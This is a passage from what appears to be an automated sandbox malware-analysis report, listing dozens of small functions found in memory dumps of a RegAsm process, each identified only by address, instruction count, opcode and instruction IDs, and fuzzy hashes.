                                                                                                                                                                                  • Opcode Fuzzy Hash: 49bec1adbdd607e6d40542e0f5ee0b269763f6f04078961a161352a179076708
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05E0EC721041586F8B41CE89D811CB67BADDB89260704805ABD5486251C672DD229BB0
                                                                                                                                                                                  Function 0101D998 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4474e0c6d006a3ce754bb6776dcca80eab7eeb06470b3ac833ad4548304f82a1
                                                                                                                                                                                  • Instruction ID: f24bd7537e383a22031c6bfcc7e3d20c32c01558b7a02556e6adb8bb70ea4219
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4474e0c6d006a3ce754bb6776dcca80eab7eeb06470b3ac833ad4548304f82a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D017712082C05FC345CAA888A18A6BFF5AECA208718888EE49187257CA29D917C720
                                                                                                                                                                                  Function 0532F121 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b568162aa24ddb172b42e50a001189021ec4be3a52c1abe91ffbcd8325d07720
                                                                                                                                                                                  • Instruction ID: d3ae95dee99a750e077a6feae11e1961e8182b078d276c6dcb2c2618218e592a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b568162aa24ddb172b42e50a001189021ec4be3a52c1abe91ffbcd8325d07720
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AE0C22140514CABC701CFB8E50068DBFF99F86210F5004FA9504CB211E8328A14E742
                                                                                                                                                                                  Function 0532DB18 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f03c03cf7b2fc58b1ecd081eb641463cda49185e32f4bc0d918085f1c53ac132
                                                                                                                                                                                  • Instruction ID: 276701cd0adc34442f79afaef3eb45aaa9ac70594cc46c19d3f3cc5fb19bdf0b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f03c03cf7b2fc58b1ecd081eb641463cda49185e32f4bc0d918085f1c53ac132
                                                                                                                                                                                  • Instruction Fuzzy Hash: 88D05E7281410CEBCB00DFA4D99178DBBFEDF49201F5001B59905E3320FE36AE046BA1
                                                                                                                                                                                  Function 05321A10 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dbcb61c05a115f7f8fd74ca8604f512e77d879e0c7a99bb43124738cc3a268e3
                                                                                                                                                                                  • Instruction ID: 0ef9fcf521b3a4ea8ad9bded2f2178d683b7b777a62f7535051bc66c324db923
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbcb61c05a115f7f8fd74ca8604f512e77d879e0c7a99bb43124738cc3a268e3
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1D05EF2104110AFD200CA04ED01FABB7AEEBC8B24F15C40EB840A3B00C666DC07C672
                                                                                                                                                                                  Function 0532CA98 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5874437f8248a341d6d88340e3de0cbbd17002e0f6d612cff8957b92ae7a03f5
                                                                                                                                                                                  • Instruction ID: 9766483a68a87036a805ec9623cf40eb8e27e460f1597d3cfafbe55142a37907
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5874437f8248a341d6d88340e3de0cbbd17002e0f6d612cff8957b92ae7a03f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE012739241158FC300DA68D851E9AB7F4EFD5610F09895FE841A7314EA71ED46C7A1
                                                                                                                                                                                  Function 05336D28 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                                                                                                                                                  • Instruction ID: 74bd5e682b91a2d78f462f720d40d5774850364329bd47b2e62bddd07364fa43
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D012321001187F8B01CE84DC01CA67B6DEB89260704C056FD1487211C672DD22DBE0
                                                                                                                                                                                  Function 02CB6438 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fb4195e55e582e2129183ede99d37a2d4157e4ff04b4e033c1b1148bcf471f9f
                                                                                                                                                                                  • Instruction ID: 88e23c6e94a60e7c130d5763c5ef6e8e57d8a1d82b8b661541326ffa26a3e87f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4195e55e582e2129183ede99d37a2d4157e4ff04b4e033c1b1148bcf471f9f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71D05EA520E3814FE285D609C921D67BFA9AF89240B24884AF890C6656C715C946C761
                                                                                                                                                                                  Function 02CBCB40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ac4f44e8f9aae037ae9470ddb91c00922d46ca923b7dc41ecf51a0557d98f288
                                                                                                                                                                                  • Instruction ID: 02bc1984a6c71f6f4430eb324bf361e2d8774195d4482a20e9b4aa07dd41a43c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac4f44e8f9aae037ae9470ddb91c00922d46ca923b7dc41ecf51a0557d98f288
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D012725091525BD301CE08D901B16BBE5DBD5614F18C85EA48596302C9A2DC06DBA2
                                                                                                                                                                                  Function 05343598 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                                                                                                                                                                  • Instruction ID: d8e6f52d84d0e9a7535ad6c92223e7db018a165c074aefbb2bfd7201b7f166f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3D05E322001187F8B00CE88DC00CA67BADEB89220B04C05AFD5887241CAB2ED22DBA0
                                                                                                                                                                                  Function 05343398 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fec346ef2d38a8b5aa94cf46737d6b1ab1ca25c208834d15b0f0c002ae09a75f
                                                                                                                                                                                  • Instruction ID: f4ebd987fd9acda481ec150ba82a04ef54301d22f9b22f2a5e16b090aa8b1ee2
                                                                                                                                                                                  • Opcode Fuzzy Hash: fec346ef2d38a8b5aa94cf46737d6b1ab1ca25c208834d15b0f0c002ae09a75f
                                                                                                                                                                                  • Instruction Fuzzy Hash: EED05E711183905FD304CB68D800D23BB6DEBC6210F04C84EE8408B342CBA29C06CB61
                                                                                                                                                                                  Function 05343400 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 49064958ddbdb8ae74edbebf42fbfd51a4ca3a5092ab071319cf74f0b971d7b9
                                                                                                                                                                                  • Instruction ID: ca61e375a8ab9218fddeba5ee39323c755f084b716a64371dae43e73a70f6b1d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 49064958ddbdb8ae74edbebf42fbfd51a4ca3a5092ab071319cf74f0b971d7b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15E08635108284AFD705CF94D9118667F71EF45210704C09FFC4587257C7728D22DB50
                                                                                                                                                                                  Function 0101D701 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c326e334f2ee1de53cdaf18bad2e5acd0a3976272924d67b1c3185d7191ddd41
                                                                                                                                                                                  • Instruction ID: 1a1db86c72075961c65451ae6820a09a3c200e2b6e6e21a941b318bfd4a2364d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c326e334f2ee1de53cdaf18bad2e5acd0a3976272924d67b1c3185d7191ddd41
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E0123010C3C05FD346CB6484A58A5BFF1AFC6218718C8CEE8C547253C625DC17C711
                                                                                                                                                                                  Function 05321A02 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9197afdb91e3e0827af627c1a4bcf5756a04f9e922186f99a9c7912d0d0184af
                                                                                                                                                                                  • Instruction ID: 002eb6abce3541bef163ec8af4be237adeca0977a16c7ee74638d62cfb07e374
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9197afdb91e3e0827af627c1a4bcf5756a04f9e922186f99a9c7912d0d0184af
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD05EB611C261AFCA08CB54EA41C5BB7F6DBC9A04B09C49FB440A3711CA62DC0BC7A2
                                                                                                                                                                                  Function 0533F9F9 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6a844d47f75a8a0dc26982770376c63f1da9c6a506113c855dfb422abf47cfc7
                                                                                                                                                                                  • Instruction ID: 68473993470a6a06321e1edebc4e9b035cb4a3e7bafb9e0776c45489c6c77a18
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a844d47f75a8a0dc26982770376c63f1da9c6a506113c855dfb422abf47cfc7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28D05E7A6152119FE304CA44D842BA6F3A6EFF9308F18886AE844C3345CA26CD028A51
                                                                                                                                                                                  Function 0534246B Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e232b383e82946cd13726d0f4c8787dc87dfbda918731e9e171ff2bc179591e6
                                                                                                                                                                                  • Instruction ID: 3016407a1287aaf9890848b52a39bcc536952bd0a01203721b35ce2380cc74ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: e232b383e82946cd13726d0f4c8787dc87dfbda918731e9e171ff2bc179591e6
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4D05E325145119FC314EA68D950E9AF3F5EFCA210F04C96FE849A7314EE71EC46C7A1
                                                                                                                                                                                  Function 0101A369 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ad2f483a8c7abed33e5dea964f3033b05f23ea7f6d9c810cddd3f769172f8c92
                                                                                                                                                                                  • Instruction ID: cd908c0357da344573fb2bd50efc9be2ae8700349eee38f7e1969924e240cfef
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad2f483a8c7abed33e5dea964f3033b05f23ea7f6d9c810cddd3f769172f8c92
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86D05EB75280209BD300CA44ED41F56B3A5EFE8710F09C40FB84093340D666DC068B62
                                                                                                                                                                                  Function 05320DD9 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b518794cd8b7b1819068caeb94ac1ea1b2bd4096eff036f22c9fa88e09a47e1a
                                                                                                                                                                                  • Instruction ID: 1dc3454b047101ccdfe28b8af42c80c7ed2fa4ce54b9464eee08dc3fb041665c
                                                                                                                                                                                  • Opcode Fuzzy Hash: b518794cd8b7b1819068caeb94ac1ea1b2bd4096eff036f22c9fa88e09a47e1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D05E761081119BE304CB44E942F56B7F5DFC8714F18844EB844A3342C666DC17C762
                                                                                                                                                                                  Function 0533FFA8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2f5e5412513e1e95618912d564910fb1ef6dbd22cebedfd887fab81f603aa7e5
                                                                                                                                                                                  • Instruction ID: 333853c0c3d8f9b7076f2020b1348cecf8048223ad2e3d218d143bc6d003273a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f5e5412513e1e95618912d564910fb1ef6dbd22cebedfd887fab81f603aa7e5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D05E311182509BD352DB68E910E6BBBB5EBC9A10F148C8EF84057312CB629D1BC762
                                                                                                                                                                                  Function 053353B0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                                                                                                  • Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                                                                                                                                                  Function 053352D1 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 06e5deecfec444b749e30eafcbd43801363808361afa2cfb63c5e679bdac41eb
                                                                                                                                                                                  • Instruction ID: 4b953c3d4d2361e1c56a562665c4d2e41fdb4b44715f6873824af5cdc3ab7d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e5deecfec444b749e30eafcbd43801363808361afa2cfb63c5e679bdac41eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: AAD017765082509BD705CF58E980E66FBAAEBC9610F09C88EA84456216CB62EC06C772
                                                                                                                                                                                  Function 02CBBBE8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1c0a182e5a98f49925d9b179248aa4347c514b2b3afca84a11ba5a4c0d69601b
                                                                                                                                                                                  • Instruction ID: 5d075bbb12ce615883af3a1cef0b85d90f84b338030b7981872909ad27ef4e53
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c0a182e5a98f49925d9b179248aa4347c514b2b3afca84a11ba5a4c0d69601b
                                                                                                                                                                                  • Instruction Fuzzy Hash: AFD0A7721080625FC250CA48D910E77F7ED8FCD600F08C49FB480D3245C929CC02C772
                                                                                                                                                                                  Function 02CBFB48 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7ccbca6bc0827f67bc564db622139f44b1a1053df4c290025112a83aa85fbc38
                                                                                                                                                                                  • Instruction ID: 13dc5c372322f7d2db7a5c34315b167397a6c78b1cc7afd90fb20afe5438b2d2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ccbca6bc0827f67bc564db622139f44b1a1053df4c290025112a83aa85fbc38
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65D05E3010A2905BE385EB5CF840963BB66FBC9220F08884EF88047253CB61AC0BC761
                                                                                                                                                                                  Function 05343168 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 45e6581d03331dc6143ddff2bf8ff34e1084fe19b6ad4eb54d491a3fb2e4ebe1
                                                                                                                                                                                  • Instruction ID: a4a08d18af9dfef64155ad4a2c38a1fbafc56ccf398eca875b50d09d2e4458a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45e6581d03331dc6143ddff2bf8ff34e1084fe19b6ad4eb54d491a3fb2e4ebe1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FD0A7791043505BE344CB68D840B52BB6AFBD4614F04C84FEC5043302C763DC06C7A0
                                                                                                                                                                                  Function 05340EB3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 61e74c9d0b04b4899bf98f15697cd3f5a864e33af8f66379dbee041af602cbe7
                                                                                                                                                                                  • Instruction ID: 188cfa2dcbe09be9a1aa72d39b639ab2983c42fd854a7d627759abf71298f3f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 61e74c9d0b04b4899bf98f15697cd3f5a864e33af8f66379dbee041af602cbe7
                                                                                                                                                                                  • Instruction Fuzzy Hash: EAD0A77188410CABC701EFB4C9405AE7BF9DB4520075040E6980CE3210FD318E105795
                                                                                                                                                                                  Function 0532A7A8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 491cabbd2679a450fa1085e83d0de6a3d0107478cde6b64e434ce267a70767b2
                                                                                                                                                                                  • Instruction ID: d97f0557c95f0cabae6b1f92095047e5fc728eb0d9df9d2db66b60e7c7615321
                                                                                                                                                                                  • Opcode Fuzzy Hash: 491cabbd2679a450fa1085e83d0de6a3d0107478cde6b64e434ce267a70767b2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D0A7322042105FD200D904CD42B92F3B5EFC4210F08881EA80183341CB62DC06CB60
                                                                                                                                                                                  Function 05339A20 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a5f07fd194e32414135f43d73215075ccdcc91c7dcf41fcd27101e30d4ca041b
